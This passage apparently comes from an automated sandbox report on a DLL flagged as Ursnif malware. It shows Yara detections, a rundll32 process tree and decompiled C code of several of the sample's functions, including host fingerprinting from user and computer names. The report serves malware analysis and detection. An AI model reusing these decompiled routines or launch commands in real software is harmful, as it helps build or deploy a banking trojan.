                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                Reputation:moderate

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: cmd.exe PID: 5724 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:04
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                                Imagebase:0xd80000
                                                                                                                                File size:232960 bytes
                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: rundll32.exe PID: 6084 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:04
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: rundll32.exe PID: 4432 Parent PID: 5724

                                                                                                                                General

                                                                                                                                Start time:00:49:04
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: rundll32.exe PID: 6012 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:08
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: rundll32.exe PID: 4360 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:13
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: WerFault.exe PID: 6140 Parent PID: 6084

                                                                                                                                General

                                                                                                                                Start time:00:50:43
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: WerFault.exe PID: 4700 Parent PID: 6012

                                                                                                                                General

                                                                                                                                Start time:00:50:49
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Analysis Process: WerFault.exe PID: 4880 Parent PID: 4360

                                                                                                                                General

                                                                                                                                Start time:00:50:53
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Chronological Activities

                                                                                                                                Disassembly

                                                                                                                                Code Analysis

                                                                                                                                Reset < >

                                                                                                                                  Analysis Process: loaddll32.exe PID: 7088 Parent PID: 3696 loaddll32.exeCOMMON

                                                                                                                                  Executed Functions

                                                                                                                                  Function 6E8D1172, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81filetimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                  			E6E8D1172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E8D2160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e8d41c4;
				_push(_t15 + 0x6e8d505e);
				_push(_t15 + 0x6e8d5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E8D215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e8d41c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                  0x6e8d1172
                                                                                                                                  0x6e8d117b
                                                                                                                                  0x6e8d117f
                                                                                                                                  0x6e8d1185
                                                                                                                                  0x6e8d118a
                                                                                                                                  0x6e8d118f
                                                                                                                                  0x6e8d1192
                                                                                                                                  0x6e8d1195
                                                                                                                                  0x6e8d119a
                                                                                                                                  0x6e8d119b
                                                                                                                                  0x6e8d119e
                                                                                                                                  0x6e8d11a9
                                                                                                                                  0x6e8d11b0
                                                                                                                                  0x6e8d11b4
                                                                                                                                  0x6e8d11b6
                                                                                                                                  0x6e8d11b7
                                                                                                                                  0x6e8d11ba
                                                                                                                                  0x6e8d11bf
                                                                                                                                  0x6e8d11c9
                                                                                                                                  0x6e8d11cb
                                                                                                                                  0x6e8d11cb
                                                                                                                                  0x6e8d11df
                                                                                                                                  0x6e8d11e5
                                                                                                                                  0x6e8d11e9
                                                                                                                                  0x6e8d1239
                                                                                                                                  0x6e8d11eb
                                                                                                                                  0x6e8d11f4
                                                                                                                                  0x6e8d120a
                                                                                                                                  0x6e8d1212
                                                                                                                                  0x6e8d1224
                                                                                                                                  0x6e8d1228
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1214
                                                                                                                                  0x6e8d1217
                                                                                                                                  0x6e8d121c
                                                                                                                                  0x6e8d121e
                                                                                                                                  0x6e8d121e
                                                                                                                                  0x6e8d11ff
                                                                                                                                  0x6e8d1201
                                                                                                                                  0x6e8d122a
                                                                                                                                  0x6e8d122b
                                                                                                                                  0x6e8d122b
                                                                                                                                  0x6e8d11f4
                                                                                                                                  0x6e8d1241

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?,?), ref: 6E8D117F
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E8D1195
                                                                                                                                  • _snwprintf.NTDLL ref: 6E8D11BA
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,6E8D41C8,00000004,00000000,?,?), ref: 6E8D11DF
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?), ref: 6E8D11F6
                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E8D120A
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?), ref: 6E8D1222
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A), ref: 6E8D122B
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?), ref: 6E8D1233
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID: @Mt MtTt$`RtAt
                                                                                                                                  • API String ID: 1724014008-3198888170
                                                                                                                                  • Opcode ID: 78df8c3f93e4b51cd015b3dd1fea98cd279ba8481b522931ca3ca1b6470c5620
                                                                                                                                  • Instruction ID: 7ba986f6b18fc5991479db6a19728f6eebf778330c13a8fb5fd8057c19e9836b
                                                                                                                                  • Opcode Fuzzy Hash: 78df8c3f93e4b51cd015b3dd1fea98cd279ba8481b522931ca3ca1b6470c5620
                                                                                                                                  • Instruction Fuzzy Hash: 44216DB264010CAFDB00EFE8CC88E9E77B9EB49355F114529F615E7180D6719D098BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D15C6, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120sleepnativesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E6E8D15C6(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E6E8D1825();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E6E8D1000(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E6E8D1397(_t57);
						}
					} while (_v8 != 0);
					_t27 = E6E8D189E(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E6E8D153C(E6E8D10B9,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E6E8D1AD7(_t53,  &_a4) != 0) {
					 *0x6e8d41b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x6e8d41b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E6E8D1000(_t60 + _t19);
				 *0x6e8d41b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E6E8D1397(_t52);
				goto L18;
			}
























                                                                                                                                  0x6e8d15cc
                                                                                                                                  0x6e8d15d1
                                                                                                                                  0x6e8d15d6
                                                                                                                                  0x6e8d1701
                                                                                                                                  0x6e8d1701
                                                                                                                                  0x6e8d15df
                                                                                                                                  0x6e8d15df
                                                                                                                                  0x6e8d15e3
                                                                                                                                  0x6e8d15e6
                                                                                                                                  0x6e8d15e7
                                                                                                                                  0x6e8d15ed
                                                                                                                                  0x6e8d15f1
                                                                                                                                  0x6e8d1628
                                                                                                                                  0x6e8d15f3
                                                                                                                                  0x6e8d15fb
                                                                                                                                  0x6e8d1601
                                                                                                                                  0x6e8d1603
                                                                                                                                  0x6e8d1608
                                                                                                                                  0x6e8d160e
                                                                                                                                  0x6e8d1610
                                                                                                                                  0x6e8d1610
                                                                                                                                  0x6e8d1617
                                                                                                                                  0x6e8d161d
                                                                                                                                  0x6e8d161d
                                                                                                                                  0x6e8d1621
                                                                                                                                  0x6e8d1621
                                                                                                                                  0x6e8d162f
                                                                                                                                  0x6e8d1636
                                                                                                                                  0x6e8d163f
                                                                                                                                  0x6e8d1642
                                                                                                                                  0x6e8d1648
                                                                                                                                  0x6e8d164b
                                                                                                                                  0x6e8d1654
                                                                                                                                  0x6e8d16fd
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d16ff
                                                                                                                                  0x6e8d165d
                                                                                                                                  0x6e8d16ae
                                                                                                                                  0x6e8d16ae
                                                                                                                                  0x6e8d16c4
                                                                                                                                  0x6e8d16c8
                                                                                                                                  0x6e8d16f0
                                                                                                                                  0x6e8d16ca
                                                                                                                                  0x6e8d16cd
                                                                                                                                  0x6e8d16d3
                                                                                                                                  0x6e8d16d8
                                                                                                                                  0x6e8d16df
                                                                                                                                  0x6e8d16df
                                                                                                                                  0x6e8d16e6
                                                                                                                                  0x6e8d16e6
                                                                                                                                  0x6e8d16f3
                                                                                                                                  0x6e8d16f9
                                                                                                                                  0x6e8d16fb
                                                                                                                                  0x6e8d16fb
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d16f9
                                                                                                                                  0x6e8d166a
                                                                                                                                  0x6e8d16a8
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d16a8
                                                                                                                                  0x6e8d166c
                                                                                                                                  0x6e8d1671
                                                                                                                                  0x6e8d1678
                                                                                                                                  0x6e8d167a
                                                                                                                                  0x6e8d167e
                                                                                                                                  0x6e8d16a0
                                                                                                                                  0x6e8d16a0
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d16a0
                                                                                                                                  0x6e8d1680
                                                                                                                                  0x6e8d1685
                                                                                                                                  0x6e8d168a
                                                                                                                                  0x6e8d1691
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1696
                                                                                                                                  0x6e8d1699
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D1825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E8D15D1), ref: 6E8D1834
                                                                                                                                    • Part of subcall function 6E8D1825: GetVersion.KERNEL32 ref: 6E8D1843
                                                                                                                                    • Part of subcall function 6E8D1825: GetCurrentProcessId.KERNEL32 ref: 6E8D185F
                                                                                                                                    • Part of subcall function 6E8D1825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E8D1878
                                                                                                                                    • Part of subcall function 6E8D1000: HeapAlloc.KERNEL32(00000000,?,6E8D15ED,00000030,74E063F0,00000000), ref: 6E8D100C
                                                                                                                                  • NtQuerySystemInformation.NTDLL ref: 6E8D15FB
                                                                                                                                  • Sleep.KERNELBASE(00000000,00000000,00000030,74E063F0,00000000), ref: 6E8D1642
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E8D1678
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E8D1696
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,6E8D10B9,?,00000000), ref: 6E8D16CD
                                                                                                                                  • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 6E8D16DF
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6E8D16E6
                                                                                                                                  • GetLastError.KERNEL32(6E8D10B9,?,00000000), ref: 6E8D16EE
                                                                                                                                  • GetLastError.KERNEL32 ref: 6E8D16FB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 3479304935-608512568
                                                                                                                                  • Opcode ID: ff99d3632a3fba676e50edeb260779ec24e88f68ea4aeea8c0cc2d9f4deb201a
                                                                                                                                  • Instruction ID: 57fe33498bd33d7167f06088e9fc718eeed136ff249199c027b249233d374f0f
                                                                                                                                  • Opcode Fuzzy Hash: ff99d3632a3fba676e50edeb260779ec24e88f68ea4aeea8c0cc2d9f4deb201a
                                                                                                                                  • Instruction Fuzzy Hash: 3831E071D00619ABDB50DBE99C44A9F7ABCEF46764F144922E404E3180EB30CE4CCBE0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3A82B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E00A3A82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xa3d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00A360B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xa3d2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xa3d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00A3789B(_v8 + _v8, _t64);
							}
							HeapFree( *0xa3d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xa3d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00A3789B(_v8 + _v8, _t64);
						}
						HeapFree( *0xa3d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                                                  0x00a3a82b
                                                                                                                                  0x00a3a833
                                                                                                                                  0x00a3a837
                                                                                                                                  0x00a3a83a
                                                                                                                                  0x00a3a83f
                                                                                                                                  0x00a3a841
                                                                                                                                  0x00a3a846
                                                                                                                                  0x00a3a846
                                                                                                                                  0x00a3a84c
                                                                                                                                  0x00a3a84e
                                                                                                                                  0x00a3a85b
                                                                                                                                  0x00a3a8bc
                                                                                                                                  0x00a3a85d
                                                                                                                                  0x00a3a862
                                                                                                                                  0x00a3a868
                                                                                                                                  0x00a3a86d
                                                                                                                                  0x00a3a87b
                                                                                                                                  0x00a3a87f
                                                                                                                                  0x00a3a88e
                                                                                                                                  0x00a3a895
                                                                                                                                  0x00a3a89c
                                                                                                                                  0x00a3a89c
                                                                                                                                  0x00a3a8a7
                                                                                                                                  0x00a3a8a7
                                                                                                                                  0x00a3a87f
                                                                                                                                  0x00a3a86d
                                                                                                                                  0x00a3a8be
                                                                                                                                  0x00a3a8c4
                                                                                                                                  0x00a3a8ce
                                                                                                                                  0x00a3a8d0
                                                                                                                                  0x00a3a8d5
                                                                                                                                  0x00a3a8e4
                                                                                                                                  0x00a3a8e8
                                                                                                                                  0x00a3a8f3
                                                                                                                                  0x00a3a8fa
                                                                                                                                  0x00a3a901
                                                                                                                                  0x00a3a901
                                                                                                                                  0x00a3a90d
                                                                                                                                  0x00a3a90d
                                                                                                                                  0x00a3a8e8
                                                                                                                                  0x00a3a918
                                                                                                                                  0x00a3a91a
                                                                                                                                  0x00a3a91d
                                                                                                                                  0x00a3a91f
                                                                                                                                  0x00a3a922
                                                                                                                                  0x00a3a925
                                                                                                                                  0x00a3a92f
                                                                                                                                  0x00a3a933
                                                                                                                                  0x00a3a937

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00A3A862
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A3A879
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00A3A886
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A3538B), ref: 00A3A8A7
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A3A8CE
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A3A8E2
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A3A8EF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A3538B), ref: 00A3A90D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
